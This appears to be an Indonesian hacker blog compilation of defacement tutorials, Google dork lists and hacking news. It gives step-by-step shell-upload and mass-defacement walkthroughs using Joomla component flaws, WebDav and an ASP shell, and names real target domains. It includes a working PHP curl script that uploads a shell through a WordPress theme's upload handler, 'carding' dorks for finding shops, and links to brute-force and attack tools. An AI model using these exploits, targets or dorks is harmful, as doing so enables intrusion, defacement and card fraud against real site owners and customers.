Deface Dengan Teknik CSRF Sexy Contact Form

Tutorial By : Haurgeulis

Alat - alatnya :

Script CSRF : DOWNLOAD [Buka scriptnya di notepad terus Save As ubah txt ke html]

Shell : DOWNLOAD

Dork : inurl:/com_sexycontactform/ [Kembangin Dorknya]
Exploit : components/com_sexycontactform/fileupload/index.php
Kalo muncul seperti ini berarti vuln

Edit Site di script CSRF

Buka Script CSRF , dan upload shell yang sudah di download

Kalau Berhasil akan muncul nama shell kalian

Jadi dehh tinggal Croot Sesuka hatimu mau di apain :v 

Shell Access :
http://www.targetcom/components/com_sexycontactform/fileupload/files/shell.php

IndoBrowser 1.0 for android

ScreenShot :

IndoBrowser adalah aplikasi internet browser yang sangat cepat dan ringan . bahkan kecepatan nya sama dengan GoogleBrowser dan juga Hampir mirip dengan UCBrowser kecepatannya . kami belum upload aplikasi ini di playstrore karena kami masih tahap percobaan ..
untuk download silahkan saja klik yang dibawah ini :


via MediaFire :
IndoBrowser

Design by  :
- Indonesia Hacker Cyber Team
- Indo Coders Crew

Support by :
appgeyser

thnks to :
- Dr.1n73ct10n
- REN'0x


Copiright 2014 BY IHC-Team and IndoCoders Crew

AnonGhost Hacker Mengklaim Hack Mozila Firefox Server Israel

The AnonGhost hacker menghack mozila, hacker yang bernama '' Mauritania Attacker '' tampaknya menjadi salah satu yang menarik AnonGhost terhadap hacking yang agresif. Kali ini hacker AnonGhost itu  mengklaim bahwa mereka telah meng-hack Domain Mozilla Firefox Israel.Para hacker mengklaim telah menargetkan domain berikut:

community.mozilla.org.il
archive.mozilla.org.il
chat.mozilla.org.il
firefox.co.il
live.mozilla.org.il
wiki.mozilla.org.il
www.firefox.co.il

mereka menulis informasi tentang mozila firefox di situs Pastebin, file tersebut berisi berbagai informasi yang ada di server mozila . tampaknya pihak dari Mozilla Firefox akan memperkuat system security servernya karena Para hacker telah menemukan cara untuk mendapatkan akses ke database yang berjudul:

h42516_bugzilla
h42516_drupal
h42516_hebmoz
h42516_mediawiki
h42516_phpbb
h42516_phpbb3
h42516_portal
h42516_staging
h42516_wordpress

The AnonGhost hacker telah menyerang domain Israel dan server nya selama bertahun-tahun, dan pada hari ini mereka masih aktif. Dalam file pastebin yang sama, Anda akan dapat melihat bahwa AnonGhost sudah merencanakan serangan mereka untuk 2015. AnonGhost hacker memperingatkan bahwa mereka akan menyerang Israel di domain # opIsrael lagi pada tahun 2015. Mereka membuat #OPisrael karena menentang negara israel yang sering memborbardir palestina
Ini bukan pertama kalinya bahwa AnonGhost menargetkan komunitas Mozilla dan perusahaan. Pada 13 Juni 2013 Mozilla Direktur Keamanan Jaminan Michael Coates melaporkan bahwa hacker AnonGhost telah memperoleh akses ke kode aktivasi dan bahwa mereka tidak menyadari bahwa kode aktivasi yang beresiko bocor.
Sebuah percakapan kecil dengan Mauritania Attacker pihak dari (AnonGhost) tentang hack pada official Mozilla Firefox:

 Official Mozila : Mengapa AnonGhost menyerang Mozilla?

Ini adalah pengingat untuk Mozilla lagi, sehingga mereka bisa tahu bahwa kita mampu melakukannya kapan saja.

Official Mozila : Berapa banyak anggota tim AnonGhost membantu dalam serangan itu, dan ada tim hacker lain atau anggota membantu Anda dalam serangan di Mozilla Firefox?

Tidak ada tim membantu dan tidak ada tim yang pernah membantu kami, ini aku bro MA ( Mauritania Attacker )

Official Mozila: Berapa banyak waktu kau mentrobos mozila firefox

15 menit

Official Mozila : Bagaimana Anda memulai hack terhadap server

Aku upload shell melalui website CMS dan kemudian melewati server.

__________________________________________________________________________________

demikian lah berita dari kami !! :) memang anonghost itu team hacker yang hebat ^_^
menurut gw itu serangan menggunakan drupal attack !

AnonSec Klaim Hacked NASA drones

Para hacker Anonsec telah meng-upload gambar yang menunjukkan, 
bagaimana hacker men-download  rekaman drone NASA dari server NASA.
Berikut FoTO - yang di upload oleh AnonSec

Deface Dengan teknik Web-Folder di windows 7

1. Persiapkan halaman Script defacement Anda, contoh :l hacked.html 
2. Buka window explorer   
3. Kemudian di dalam tampilan windows explorer klik kanan dan pilih Add a network Location
     
4. Selanjutnya klik nekt  Pada Internet or network addres, masukkan alamat website target Anda! misal target Anda adalah http://yourtarget.com/ 
5. klik nekt dan tunggu sampai prosesnya selesai, lama tidaknya proses tergantung koneksi internetmu. 
6. Selanjutnya memberikan nama web folder tersebut, klik nekt saja langsung karena secara otomatis akan memberikan nama sesuai alamat website tsb.
7. klik finish dan web folder tersebut akan muncul di windows explorer Anda.  
8. Langkah selanjutnya masukkan halaman defacement Anda yang sebelumnya sudah dipersiapkan, misal deface.html ke dalam web folder yang telah dibuat tadi. htm
9. Untuk membuka hasil deface Anda tersebut tinggal menambahkan nama file defacement Anda dibelakang url website tsb. Misal: http://yourtarget.com/ menjadi http://yourtarget.com/deface.htm
   
   Live target
   
   zgsfjw.net
   centro.anje.pt
   www.ziangli.com 
   6.shicheng.gov.cn
   www.ville-mordelles.fr 
   www.podiocom.com 
   www.journeezerotracas.fr 
   www.journeezerotracas.com 
   www.journee0tracas.com 
   www.comune.torrice.fr.it 
   www.chinamaster88.com 
   www.chateaudelepinay.fr 
   www.centroformazioneitalia.it 
   www.bjautoobd.com 
   www.autodiagtool.com 
   usa.automotormaster.com
   so-sighty.fr
   perros-guirec.icor.fr
   myhealthcity.com
   malaysiahealthcareindonesia.com
   lapetitehublais.fr
   handistar.fr
   gz.autoobd-ii.com
   gz.automotormaster.com
   expert-comptable-35.fr
   carrelages-palmieri.com
   camion-road-show.com
   autoobd.cn
   hibis.co.id

Tutorial Deface Directory Folder dengan WebDav dan asp Shell IHCT

website yang saya gunkan ini adalah website thailand dan udah ane pakay webdav dan sudah tertanam asp Shell IHCT di dalem site nya kalo mau download asp shell IHCT Klik disini




untuk di dalam asp shell IHCT .. saya mengunakan satu website


http://www.ccamarketing.com/scripts/default.asp


lihat nii gambar . website tu ditulis sebagai : Ccmarketing


 
ok ... sekarang kita dah ada target ..


kalian masuk di dalam directory Ccmarketing .. ikut nama folder domain kalian sendiri .. untuk saya .. saya akan masuk folder macam dalam anak panah tu..


ok.. kita dah di dalam directory Ccmarketing


 ok ... macam gambar dekat atas tu ..
bila luu dah masuk dekat dalam directory tu .. luu akan jumpa perkataan : Mass deface on : ??????


ok.. kita klik tu .. perkataan tu berada di bawah garis yang pertama selepas Test.. macam dalam gambar ni .. (bahasa lain)


 Ok .. perkataan mass tu adalh untuk membuat pemeriksaan sama ada directory website tu boleh di deface ataupun tidak .. lu klik mass dulu .. kalau dah dia akan tertulis Done !


selepas tu .. bila dia  done .. kita ke langkah yang seterusnya .. korang klik dekat Mass deface macam dalam anak panah dekat gambar atas tu


 Brute: Test and Deface root and sub directories.

Single: Test and deface only root directories.


lihat perkataan tu ?? ok .. kita dah  selesai ..

di dalam kotak tu .. kamu masukan script deface kalian dekat dalam tu ... tik pada kotak ROOT

ok .. Lepas tu kalian tekan : Deface All

Maka akan keluar macam ni
 

ok .. nampaknya directory yang sudah di Deface itu adala dalam directory prodimages .. macam dalam gambar di atas

ok .. link di atas tadi adalah
http://www.ccamarketing.com/scripts/default.asp


directory yang sudah di Deface tadi adalah **/prodimages


kita ambil link


http://www.ccamarketing.com/ 


tambahkan /prodimages dekat belakang link itu .. di situ directory yang sudah di deface


terpulang dengan directory yang kalian dah deface tu .. untuk Ccamarketing ini .. directory yang dah di deface adalah /prodimages ..


kalau yang sudah di deface tu pada directory yang lain .. luu letak la nama directory tu belakang domain tu .. untuk domain yang saya guna ni adalah /prodimages .. jadi saya perlu buat macam ini


http://www.ccamarketing.com/prodimages 


ok .. copy link tu dah paste dekat address bar dan tekan enter


 


Deface saya berada di situ ..
ok .. jadi selamat mencuba ... Enjoy ..
peace ah !

Tutorial Upload shell.php.jpg Dengan TAMPER DATA

Kalo anda masih bingung dengan Post yang sebelumnya kami upload di : Cara Upload file ( PHP ) dengan tamper data Kali ini kita akan share vidio nya di post ini , langsung saja nonton dibawah ini

Deface website dengan WebDav Vuln(erable) Attacker ++

WebDav Vuln(erable) Attacker ++ by BeKaBe F. Adalah perangkat sederhana untuk mengHack atau Deface website yang menggunakan server Webdav atau IIS yang tidak kebal
Dengan perangkat ini, Anda dapat memposting skrip ASP (shell ASP, misalnya) atau mengupload file, bisa file teks; gambar; aplikasi, apa pun, terserah Anda
Namun pada beberapa server Webdav, Anda tidak diizinkan mengupload file ASPanda bisa hapus index dan mass deface dengan teknik jumping shell asp

Download http://www.tusfiles.net/rga8wuek3pdr
or 
Download: http://riyanhidayatsamosir.com/files/WebDav++.zip
or
Download http://www.4shared.com/zip/pzvuxOf9ce/WebDav.html

Cara menggunakan Tools nya mudah , cukup seperti webdav by hmei7 biasa 

Bypass Facebook Security 100%

Bypas Facebook Security 100%Script Bruteforce MULTI account facebook [PHP] : http://pastebin.com/xYX8HSXR
Gak Perlu panjang lebar , langsung aja tonton dibawah ini 

Google Dork Com_User New

Sudah bosen dengan dork com_users anda dan jarang sekali bnyak web.vuln nih ada yang baru 

DORK :

Quote:intext:Usar un nombre de usuario y contraseña válido para poder tener acceso a la Administración.. Joomla!® es software libre distribuido bajo la licencia GNU/GPL. Pack creado por Joomla!Spanish - 2011 - Hosting Joomla Spanish Webempresa

Quote:intitle:home page beez joomla 1.6 inurl:com/joomla

Quote:intitle:home page beez 2 inurl:com/joomla

Quote:intitle:home page beez 5 inurl:com/joomla

Quote:intitle:home page atomic inurl:com/joomla

Quote:intext:Joomla!® - бесплатное программное обеспечение, распространяемое по лицензии GNU General Public License
Локализация: Портал Joomla! по-русски. Техническая поддержка: Форум русской поддержки Joomla! CMS inurl:/administrator

Quote:intext:Veuillez utiliser un identifiant et un mot de passe valides pour accéder à l'administration. site:it

Quote:intext:Введите существующие логин и пароль доступа к Панели управления. site:ru

Quote:inurl:/administrator/index.php intext:Use a valid username and password to gain access to the administrator backend. Joomla!® is free software released under the GNU General Public License.

Quote:intitle:joomla! intext:joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com

Quote:inurl:index.php/using-joomla/extensions/components/users-component/registration-form

Quote:inurl:index.php/using-joomla/extensions/plugins site:.com

Quote:inurl:index.php/using/joomla site:com

Quote:inurl:index.php/using-joomla/extensions/components/content-component/article-category-list/50-upgraders

Quote:inurl:index.php/using-joomla/extensions/components/content-component/article-categories/28-park-site/photo-gallery

Quote:inurl:index.php/using-joomla/parameters/26-sample-data-articles/park-site

Quote:Inurl:index.php/plugins site:com

Quote:Inurl:index.php/rss=feed site:com

Quote:inurl:index.php/joomla/content/category-blog/24-joomla site:com

Quote:inurl:index.php/using-joomla/extensions/components/content-component/article-categories/84-gd-articles site:.com

Quote:inurl:Home Page Beez joomla 1.6 index.php using-joomla

Quote:inurl:index.php joomla! 1.7 - open source content management site:com

Quote:inurl:index.php/using-joomla/extension/components/content-component/article-category-list/50-upgraders site:com

Quote:intext:joomla! 1.7 - open source content management site:jp

Quote:inurl:index.php/19-sample-data-articles/joomla/50-upgraders site:.com

Quote:inurl:index.php/using-joomla/extensions/templates/beez-2/home-page-beez-2 site:as

Quote:inurl:index.php/19-sample-data-articles/joomla site:com

Quote:inurl:Home Page Beez5 joomla 1.6 index.php/using-joomla/extensions/components/users-component/registration-form site:com

Quote:intext:"joomla! 1.7 - Open Source Content Management" inurl:sites-guide.co.vn

Quote:intext:"joomla! 1.7 - Open Source Content Management" inurl:statscrop+gov

Quote:intext:"joomla! 1.6 - Open Source Content Management" inurl:statscrop+gov

Quote:intext:"joomla! 1.7 - Open Source Content Management" inurl:statmyweb+gov

Quote:intext:"joomla! 1.6 - Open Source Content Management" inurl:statmyweb+gov

Quote:intext:"joomla! 1.6 - Open Source Content Management" inurl:gov rank

Quote:intext:Joomla! is the mobile-ready and user-friendly way to build your website. Choose from thousands of features and designs. Joomla! is free and open source.

Quote:intext:The Joomla! name is used under a limited license from Open Source Matters in the United States and other countries.JoomlaShine.com is not affiliated with or endorsed by Open Source Matters or the Joomla! Project.

Quote:intext:Joomla! 1.7Â continues development of the Joomla Framework and CMS as a powerful and flexible way to bring your vision of the web to reality

Quote:intext:Joomla! Spanish.Gestor de Contenido Open Source 2.5 inurl:com/joomla

Dork Carding Terbaru

inurl:".php?cat="+intext:"Paypal"+site:UK

inurl:".php?cat="+intext:"/Buy Now/"+site:.net

inurl:".php?cid="+intext:"online+betting"

inurl:".php?id=" intext:"View cart"

inurl:".php?id=" intext:"Buy Now"

inurl:".php?id=" intext:"add to cart"

inurl:".php?id=" intext:"shopping"

inurl:".php?id=" intext:"boutique"

inurl:".php?id=" intext:"/store/"

inurl:".php?id=" intext:"/shop/"

inurl:".php?id=" intext:"toys"

inurl:".php?cid="

inurl:".php?cid=" intext:"shopping"

inurl:".php?cid=" intext:"add to cart"

inurl:".php?cid=" intext:"Buy Now"

inurl:".php?cid=" intext:"View cart"

inurl:".php?cid=" intext:"boutique"

inurl:".php?cid=" intext:"/store/"

inurl:".php?cid=" intext:"/shop/"

inurl:".php?cid=" intext:"Toys"

inurl:".php?cat="

inurl:".php?cat=" intext:"shopping"

inurl:".php?cat=" intext:"add to cart"

inurl:".php?cat=" intext:"Buy Now"

inurl:".php?cat=" intext:"View cart"

inurl:".php?cat=" intext:"boutique"

inurl:".php?cat=" intext:"/store/"

inurl:".php?cat=" intext:"/shop/"

inurl:".php?cat=" intext:"Toys"

inurl:".php?catid="

inurl:".php?catid=" intext:"View cart"

inurl:".php?catid=" intext:"Buy Now"

inurl:".php?catid=" intext:"add to cart"

inurl:".php?catid=" intext:"shopping"

inurl:".php?catid=" intext:"boutique"

inurl:".php?catid=" intext:"/store/"

inurl:".php?catid=" intext:"/shop/"

inurl:".php?catid=" intext:"Toys"

inurl:".php?categoryid="

inurl:".php?categoryid=" intext:"View cart"

inurl:".php?categoryid=" intext:"Buy Now"

inurl:".php?categoryid=" intext:"add to cart"

inurl:".php?categoryid=" intext:"shopping"

inurl:".php?categoryid=" intext:"boutique"

inurl:".php?categoryid=" intext:"/store/"

inurl:".php?categoryid=" intext:"/shop/"

inurl:".php?categoryid=" intext:"Toys"

inurl:".php?pid="

inurl:".php?pid=" intext:"shopping"

inurl:".php?pid=" intext:"add to cart"

inurl:".php?pid=" intext:"Buy Now"

inurl:".php?pid=" intext:"View cart"

inurl:".php?pid=" intext:"boutique"

inurl:".php?pid=" intext:"/store/"

inurl:".php?pid=" intext:"/shop/"

inurl:".php?pid=" intext:"toys"

inurl:".php?prodid=

inurl:".php?prodid=" intext:"shopping"

inurl:".php?prodid=" intext:"add to cart"

inurl:".php?prodid=" intext:"Buy Now"

inurl:".php?prodid=" intext:"View cart"

inurl:".php?prodid=" intext:"boutique"

inurl:".php?prodid=" intext:"/store/"

inurl:".php?prodid=" intext:"/shop/"

inurl:".php?prodid=" intext:"toys"

inurl:".php?productid='

inurl:".php?productid=" intext:"shopping"

inurl:".php?productid=" intext:"add to cart"

inurl:".php?productid=" intext:"Buy Now"

inurl:".php?productid=" intext:"View cart"

inurl:".php?productid=" intext:"boutique"

inurl:".php?productid=" intext:"/store/"

inurl:".php?productid=" intext:"/shop/"

inurl:".php?productid=" intext:"Toys"

inurl:".php?product="

inurl:".php?product=" intext:"shopping"

inurl:".php?product=" intext:"add to cart"

inurl:".php?product=" intext:"Buy Now"

inurl:".php?product=" intext:"View cart"

inurl:".php?product=" intext:"boutique"

inurl:".php?product=" intext:"/store/"

inurl:".php?product=" intext:"/shop/"

inurl:".php?product=" intext:"toys"

inurl:".php?product=" intext:"DVD"

inurl:".php?products="

inurl:".php?products=" intext:"shopping"

inurl:".php?products=" intext:"add to cart"

inurl:".php?products=" intext:"Buy Now"

inurl:".php?products=" intext:"View cart"

inurl:".php?products=" intext:"boutique"

inurl:".php?products=" intext:"/store/"

inurl:".php?products=" intext:"/shop/"

inurl:".php?products=" intext:"toys"

inurl:".php?products=" intext:"DVD"

inurl:".php?proid="

inurl:".php?proid=" intext:"shopping"

inurl:".php?proid=" intext:"add to cart"

inurl:".php?proid=" intext:"Buy Now"

inurl:".php?proid=" intext:"View cart"

inurl:".php?proid=" intext:"boutique"

inurl:".php?proid=" intext:"/store/"

inurl:".php?proid=" intext:"/shop/"

inurl:".php?proid=" intext:"toys"

inurl:".php?shopid="

inurl:".php?shopid=" intext:"shopping"

inurl:".php?shopid=" intext:"add to cart"

inurl:".php?shopid=" intext:"Buy Now"

inurl:".php?shopid=" intext:"View cart"

inurl:".php?shopid=" intext:"boutique"

inurl:".php?shopid=" intext:"/store/"

inurl:".php?shopid=" intext:"/shop/"

inurl:".php?shopid=" intext:"Toys"

inurl:".php?itemid="

inurl:".php?itemid=" intext:"shopping"

inurl:".php?itemid=" intext:"add to cart"

inurl:".php?itemid=" intext:"Buy Now"

inurl:".php?itemid=" intext:"View cart"

inurl:".php?itemid=" intext:"boutique"

inurl:".php?itemid=" intext:"/shop/"

inurl:".php?itemid=" intext:"/store/"

inurl:".php?itemid=" intext:"Toys"

inurl:".php?orderid="

inurl:".php?orderid=" intext:"shopping"

inurl:".php?orderid=" intext:"add to cart"

inurl:".php?orderid=" intext:"Buy Now"

inurl:".php?orderid=" intext:"View cart"

inurl:".php?orderid=" intext:"boutique"

inurl:".php?orderid=" intext:"/shop/"

inurl:".php?orderid=" intext:"/store/"

inurl:".php?orderid=" intext:"Toys"

inurl:".php?catalogId="

inurl:".php?catalogId=" intext:"shopping"

inurl:".php?catalogId=" intext:"add to cart"

inurl:".php?catalogId=" intext:"Buy Now"

inurl:".php?catalogId=" intext:"View cart"

inurl:".php?catalogId=" intext:"boutique"

inurl:".php?catalogId=" intext:"/shop/"

inurl:".php?catalogId=" intext:"/store/"

inurl:".php?catalogId=" intext:"Toys"

inurl:".php?aid="

inurl:".php?aid=" intext:"shopping"

inurl:".php?aid=" intext:"add to cart"

inurl:".php?aid=" intext:"Buy Now"

inurl:".php?aid=" intext:"View cart"

inurl:".php?aid=" intext:"boutique"

inurl:".php?aid=" intext:"/shop/"

inurl:".php?aid=" intext:"/store/"

inurl:".php?aid=" intext:"toys"

inurl:".php?artid="

inurl:".php?artid=" intext:"shopping"

inurl:".php?artid=" intext:"add to cart"

inurl:".php?artid=" intext:"Buy Now"

inurl:".php?artid=" intext:"View cart"

inurl:".php?artid=" intext:"boutique"

inurl:".php?artid=" intext:"/shop/"

inurl:".php?artid=" intext:"/store/"

inurl:".php?artid=" intext:"toys"

inurl:".php?articleid="

inurl:".php?articleid=" intext:"shopping"

inurl:".php?articleid=" intext:"add to cart"

inurl:".php?articleid=" intext:"Buy Now"

inurl:".php?articleid=" intext:"View cart"

inurl:".php?articleid=" intext:"boutique"

inurl:".php?articleid=" intext:"/shop/"

inurl:".php?articleid=" intext:"/store/"

inurl:".php?articleid=" intext:"toys"

Cara Deface Dengan Exploit Orang Themes File Upload

Assalamualaikum karena saya udah lama gk share tutor di karenakan Sibuk dengan sekolah, mumpung ada waktu luang mau share tutor.. ;)
Exploit orange themes File Upload

Bahan-Bahan:
-XAMPP (Serch Di Google Banyak Kok)
-Shell

Langkah-Langkah:
1).Search Di Google Gunakan Dork

inurl:"/wp-content/themes/bordeaux-theme/"
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"  

2).Ane Pkek Dork Yang inurl:"/wp-content/themes/radial-theme/"

3).Jika Ketemu Masukan Exploit /wp-content/themes/radial-theme/functions/upload-handler.php jika Keluar Error Situsnya Vuln

4).Buat File Baru Berekstensi .php Contoh lol.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit :D

<?php
$uploadfile="shellKamu.php";
$ch = curl_init("http://site.com/wp-content/themes/radial-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>



5).Masukan Shell Ente Juga Jadi Ada Dua File Di Directory C:/XAMPP/php yaitu Shell Dan Script Tadi :D



6).Aktifkan XAMPP Klik Start Pada Apache




7).Buka cmd Dengan Cara Klik Start -> Run -> Ketik "cmd"
8).Ketik cd\xampp/php



9)ketik php namascript.php Contoh: php lol.php
10).Jika Succes Akan Ada Nama Shellnya :D


11).Untuk Letak Shellnya Ada Di
http://site.com/wp-content/uploads/2013/11/namashell.php